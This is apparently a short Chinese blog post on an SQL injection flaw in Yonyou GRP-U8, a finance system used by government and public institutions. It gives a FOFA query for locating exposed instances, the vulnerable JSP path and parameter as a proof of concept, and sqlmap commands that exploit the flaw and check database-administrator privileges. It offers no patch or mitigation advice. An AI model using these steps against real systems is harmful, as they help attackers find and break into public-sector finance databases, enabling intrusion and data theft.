用友GRP-U8是面向政府及行政事业单位的财政管理应用。北京用友政务软件有限公司GRP-U8 SQL注入漏洞。
![在这里插入图片描述](https://img-blog.csdnimg.cn/fe260ff4d6d14abeb0e576e4bbf3c385.png
fofa查询语法
app="用友-GRP-U8"
POC:拼接/u8qx/slbmbygr.jsp?gsdm=1 访问
漏洞存在
漏洞不存在
使用SQLmap进行注入利用
sqlmap -u "http://xxxx:xxxx/u8qx/slbmbygr.jsp?gsdm=1*"
查询当前用户权限
sqlmap -u "http://xxxx:xxxx/u8qx/slbmbygr.jsp?gsdm=1*" --batch --is-dba